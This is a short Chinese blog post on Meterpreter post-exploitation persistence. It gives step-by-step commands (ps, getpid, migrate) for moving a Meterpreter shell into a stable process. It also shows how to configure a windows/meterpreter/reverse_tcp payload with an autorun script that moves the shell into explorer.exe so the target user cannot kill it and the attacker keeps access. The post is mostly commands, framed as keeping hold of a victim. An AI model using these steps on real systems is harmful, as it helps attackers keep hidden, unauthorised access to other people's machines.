meterpreter作为一个进程时容易被清除,如果将它和系统经常运行的进程进行绑定,就能够实现持久化。

1.进程迁移

  • 1.在Meterpreter下输入ps(获取目标机正在运行的进程,记住目标进程的pid xxxx)
  • 2.输入getpid命令(查看meterpreter shell的进程号)
  • 3.输入migrate xxxx(将meterpreter shell的pid调到xxxx里相对稳定应用的进程里)
  • 4.最后用getpid再次查看下是否更换成功。

2.上线后自动化迁移指定进程

set payload windows/meterpreter/reverse_tcp和设置完了端口与HOST的时候,执行如下命令:set autorunscript migrate -n explorer.exe
意思是上线后将shell进程迁移到了资源管理器。防止被用户删除掉,然后丢失目标。

在迁移后有些时候可能会掉线,耐心等待十几秒会连上。目标资源管理器被重启也会导致掉线。
最后修改:2020 年 02 月 19 日
© 允许规范转载
如果觉得我的文章对你有用,请随意赞赏